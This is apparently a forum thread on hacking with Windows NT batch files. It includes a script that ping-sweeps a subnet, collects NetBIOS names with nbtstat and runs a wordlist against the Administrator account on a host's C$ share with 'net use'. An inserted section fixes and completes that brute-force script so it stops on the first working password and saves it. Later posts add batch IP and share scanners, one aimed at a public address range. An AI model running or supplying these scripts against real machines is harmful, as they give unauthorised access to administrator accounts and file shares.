-
Hacking with DOS?
Many are quick to say Windows is lame. Well, it might not be as stable and might not come with all the third-party software *nix has, but an operating system is only as lame as its operator. Now I can think of a dozen boring examples, but nobody would pay any attention, so I made up a simple scenario that might get some to really try to learn their OS.
(Lame though it may be, it's just to illustrate a point.)
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
What, I don't have a scanner on the computer I'm on and can't download EXEs? No prob! This is an NT-based box and I know my ****:
sending.bat
------------------------------------------
REM all the text for each "for" statement
REM must be on one line
REM 1: ping every host once and keep the lines that came back with a reply
for /L %%x IN (1,1,255) DO ping -n 1 10.0.0.%%x | find /I "reply" >>pg.txt
REM 2: cut each line at the colon, keeping only "Reply from 10.0.0.x"
for /F "tokens=1 delims=:" %%x in (pg.txt) DO echo %%x >>pg2.txt
REM 3: the address is the third space-separated word; dump its NetBIOS name table
for /f "tokens=3" %%x IN (pg2.txt) DO nbtstat -A %%x >>pg3.txt
-------------------------------------------
You could enter it one line at a time at the command prompt without making a batch file, but that's not nearly as much fun.
In the first "for" statement, (1,1,255) says: make %%x equal 1, incrementing by 1 each loop until it reaches 255. In a batch file a single '%' is removed, so it must be doubled: "%%".
ping returns:
Reply from 10.0.0.1: bytes=32 time=150ms TTL=59
By changing the default delimiter to a colon (tokens=1 delims=:), the line is split into two tokens and only the first is written to pg2.txt; the colon itself is dropped because it is the delimiter, leaving only:
Reply from 10.0.0.1
In the third "for" statement we use the default (space) delimiter, making the IP address the third token (tokens=3), and using nbtstat -A we record the results to pg3.txt.
Now it's time to get yourself a drink and go to the bathroom before you get into the long haul:
for /f "tokens=1" %%x in (wordlist.txt) do NET USE \\10.0.0.1\c$ %%x /USER:Administrator
This is all done without using some stupid, poorly made program that may contain a trojan.
You're on your own from here. I'm not trying to teach you to break into a computer; there's enough written in tutorials to show you that. I'd rather show you what you can do if you know your OS. Just remember, if you try this on the net you could get screwed. There is nothing stealthy about this.
Have a happy new year and resolve to really learn what you have. Don't wait for that special book or tutorial to come along... just do it.
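The three steps of the post (ping sweep, nbtstat lookup, dictionary run against C$) put into one cmd.exe script, as an added example that is not code from the original post. It fixes the traps a reader would otherwise hit: "Reply from" also appears in "Destination host unreachable" lines, so a genuine reply is matched on "TTL=" instead; a line ending in a digit followed by ">>" is parsed as a file-handle redirect, so the redirection is written first; and the net use syntax puts the password after the share and takes "/user:" with no space. The subnet 10.0.0.0/24 and the file wordlist.txt are taken from the post; the file names alive.txt, pg3.txt and found.txt are assumptions.

```batch
@echo off
setlocal EnableExtensions
REM Added example (not from the original post): ping sweep, NetBIOS lookup
REM and a dictionary run against the admin share with cmd.exe built-ins only.
REM Assumptions: subnet 10.0.0.0/24 as in the post, target 10.0.0.1, and a
REM wordlist.txt with one candidate password per line.
set "NET=10.0.0"
set "TARGET=%NET%.1"
set "WORDLIST=wordlist.txt"
for %%f in (alive.txt pg3.txt found.txt) do if exist %%f del %%f

REM 1. Ping sweep. "TTL=" only occurs in a real echo reply, so neither
REM    "Reply from <own IP>: Destination host unreachable" nor
REM    "TTL expired in transit" is recorded as a live host.
REM    Redirection comes first: "echo 10.0.0.1>>alive.txt" would read the
REM    final 1 as a file handle and drop it from the address.
for /L %%x in (1,1,254) do (
    ping -n 1 -w 500 %NET%.%%x | find "TTL=" >nul && (>>alive.txt echo %NET%.%%x)
)
if not exist alive.txt (
    echo no host in %NET%.0/24 answered
    goto :eof
)

REM 2. NetBIOS name table of every live host (UDP 137 must be reachable).
for /F "usebackq" %%h in ("alive.txt") do (
    >>pg3.txt echo === %%h
    >>pg3.txt nbtstat -A %%h
)

REM 3. Dictionary run against C$ of one host. Password goes right after
REM    the share name, "/user:" takes no space. Stop at the first hit and
REM    drop the session again. Each failed attempt is a logon failure in
REM    the target's Security log (if logon auditing is on) and counts
REM    toward any account lockout policy.
for /F "usebackq delims=" %%p in ("%WORDLIST%") do (
    net use \\%TARGET%\c$ "%%p" /user:Administrator >nul 2>&1 && (
        >>found.txt echo %TARGET% Administrator %%p
        net use \\%TARGET%\c$ /delete >nul
        goto :hit
    )
)
echo no password in %WORDLIST% worked for %TARGET%
goto :eof

:hit
type found.txt
endlocal
```

Save it as sweep.cmd and run it from cmd.exe on an NT-based Windows; "delims=" in the last loop keeps a whole line as the candidate, so passwords containing spaces are tried intact, unlike the "tokens=1" form in the post.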
-
I guess this needs to be pointed out more clearly.
This will not work on 9x machines.
For those who do not know their basics, "for" is an internal command; that is to say, it is contained in command.com and cmd.exe.
The for command on 9x machines will not loop through the contents of files or increment variables. Only the for command of NT or better machines will do this.
-
You bring up a very good point here Ted. I mean, why not learn the OS if you are going to be working with it? As for the "hack", I personally don't have much experience with batch files or programming for that matter, but I do understand the implications. For the most part, I can look at files like this and figure out what they mean, so your post has proven quite helpful (That's the point, I know.) I have not had much choice in learning Windows, but I am trying to learn as much as I can of Linux. My efforts have proven invaluable since I have been assigned projects involving the OS at work.
Next time make up your mind where you want to post it; you moved it on me earlier, and I had to retype it from memory! j/k Keep up the good work Ted.
Cheers.
-
Hmmm, nice one, a NetBIOS batch file scanner.
Gonna use this one for sure.
But it scans only for the administrator account, or am I wrong?
-
you said this would work on "NT or better" but I tried it on BSD and it didn't work :-(
(joking)
Good tutorial, I enjoyed reading it.
-
Ok, someone needs to PM me, I'm confused... sorry.
-
Fantastic post... The only problem posed is that, like someone before me said, it only scans for the "admin". So one might be confronted with not only finding the password but a valid user name as well.
Scat
-
I just used that as an example of what you could do, as food for thought. You could use the same principle to scan for null connections or whatever; just put the commands with args after the DO. But, as was stated earlier, you could get busted.
On the non-hacking side, I have a bunch of remote locations with WinVNC listening on DSL connections. Each location sends a file with its location code as its name to an FTP server. Using the FOR command I loop through the log twice. The first pass gets piped through 'find' and creates a file containing only the lines with the matching location code. The second time I loop through, making %%X equal the IP address. The next line starts VNC with %%X, which is the last, i.e. latest, address in the log file. Now all I have to do is enter the password.
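The two-pass FOR technique from the post above, written out as an added example that is not the poster's own script. The FTP log format is an assumption (one upload per line: date, time, client IP, command, file name), the log content is constructed for the example, and LOC042 and vncviewer.exe are placeholders for the real location code and VNC client.

```batch
@echo off
setlocal EnableExtensions
REM Added example (not the poster's script): find the latest IP a remote
REM site uploaded from and hand it to the VNC viewer.
REM Assumed log line format: date time client-ip command file
set "CODE=LOC042"
set "LOG=ftp.log"

REM Constructed sample log; in practice this is the FTP server's own log.
(
    echo 2004-01-05 08:01:12 192.0.2.10 STOR LOC017
    echo 2004-01-05 08:03:40 192.0.2.55 STOR LOC042
    echo 2004-01-06 08:02:05 192.0.2.11 STOR LOC017
    echo 2004-01-06 08:04:51 192.0.2.77 STOR LOC042
) > %LOG%

REM Pass 1: keep only the lines for our location code. "type | find" is
REM used instead of "find file" so no "---------- FTP.LOG" header is added.
type %LOG% | find "%CODE%" > %CODE%.txt

REM Pass 2: the client IP is the third space-separated token. Every
REM iteration overwrites IP, so after the loop it holds the last, i.e.
REM latest, address in the log.
set "IP="
for /F "usebackq tokens=3" %%a in ("%CODE%.txt") do set "IP=%%a"
if not defined IP (
    echo no entry for %CODE% in %LOG%
    goto :eof
)
echo latest address for %CODE% is %IP%

REM Assumed viewer; replace with the installed VNC client.
start "" vncviewer.exe %IP%
endlocal
```

With the constructed log the script picks 192.0.2.77, the later of the two LOC042 uploads; the log is read top to bottom, so this relies on the server appending new entries at the end.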
-
Very smart to point out that you must know your OS if you want to hack anything, even with simple batch files in DOS.
-
WELCOME TO AO
Hi dickfitzwell,
WELCOME TO AO!
I believe that hacking interests you, as it interests us here in AO, especially being aware of it and avoiding such things in the near future.
You could visit the AO FAQ for more of an introduction to AO.
For a start, like any organization you are willing to join, AO has rules, traditions, and a community willing to help and share their knowledge and opinions. The FAQ could be a short walk-through for you to get involved in the community.
Enjoy your stay!
Yo!
-
Yup... agree with you...
You just told the kids something new.
I imagine the copy and paste... wish there was a counter for that, lol.
-
beee, please read scratchINtheBOX's previous post ( that's the one right before yours on page one )
Thanks,
Eg
-
Ok, obviously some people don't get what scratchinthebox was trying to say, so I'll translate it:
Don't post in 2 year old threads!!!
-
I'll make the post of Theduck even more clear:
Don't post in 2 year old threads!!! <--------------------
Don't post in 2 year old threads without any worthwhile answers or suggestions!!! :-D
-
READ THE FAQ
beee,
Now, I can see more reasons why the AO guys are pissed off and will probably NEG you some if you don't get yourself more AWARE of the FAQ.
Yo!
-
Thank you for all your suggestions.
-
I wrote an IP-Scanner in Batch, too. Look at this (long version/short version):
================================================================
@echo off
REM Usage: ipscan <first three octets with trailing dot> <start> <end> [-n] [-f]
if "%1"=="--help" goto hlp
if "%3"=="" goto hlp
set a=%1
set b=%2
set c=-n
set d=-f
if exist alive.txt del alive.txt
if exist shared.txt del shared.txt
:loop
cls
if %b% GTR %3 goto end
echo testing %a%%b%
ping -n 1 -i 1 -l 1 -w 1 %a%%b% |find /i "Received = 1" || goto endofloop
rem ===:::>>> ping's errorlevel is not always 0 on success; solved with "||" (run the following command if the previous one fails)
rem "Received = 1" is the English ping statistics line; the German original matched "Empfangen = 1"
rem redirection first: "echo 192.168.1.1>>alive.txt" would take the final 1 for a file handle
>>alive.txt echo ==========================
>>alive.txt echo %a%%b%
if "%c%"=="%4" goto netname
if "%c%"=="%5" goto netname
rem ===:::>>> this way the parameters -n and -f can be given in any order
goto 1
:netname
nslookup %a%%b% |find "Name:">>alive.txt
:1
if "%d%"=="%4" goto share
if "%d%"=="%5" goto share
goto endofloop
:share
>>shared.txt echo ==========================
>>shared.txt echo %a%%b%
>>shared.txt net view %a%%b%
:endofloop
set /a b=b+1
cls
goto loop
:hlp
echo.
echo ===== Help =====
echo Parameter 1: IP up to the 3rd octet, including the trailing dot
echo Parameter 2: 4th octet of the IP at which the scan should start
echo Parameter 3: 4th octet of the IP at which the scan should end
echo Parameter 4: -n ; name resolution (also of offline machines, since it uses nslookup!)
echo Parameter 5: -f ; shows the network shares (experimental)
echo.
echo Examples:
echo ipscan 192.168.1. 1 66
echo Scans the network 192.168.1.1-66.
echo ipscan 192.168.1. 6 9 -n
echo Scans the network 192.168.1.6-9 and reads out the NetBIOS names
goto end2
:end
cls
type alive.txt
:end2
=========================================================
=========================================================
@echo off
echo IP-Scan>ipscanlog
echo Starttime:>>ipscanlog
time /t>>ipscanlog
set a=81.201.41.
set b=1
:loop
set /a b=b+1
if %b%==25 goto end
ping %a%%b% -n 1 -l 10 -w 1|find "Received = 1"
REM "Received = 1" is the English ping statistics line; the German original matched "Empfangen = 1"
if errorlevel 1 echo %a%%b% is dead>>ipscanlog
if not errorlevel 1 echo %a%%b% is alive>>ipscanlog
REM cls
goto loop
:end
find "alive" ipscanlog
echo Endtime:>>ipscanlog
time /t>>ipscanlog
find ":" ipscanlog
echo.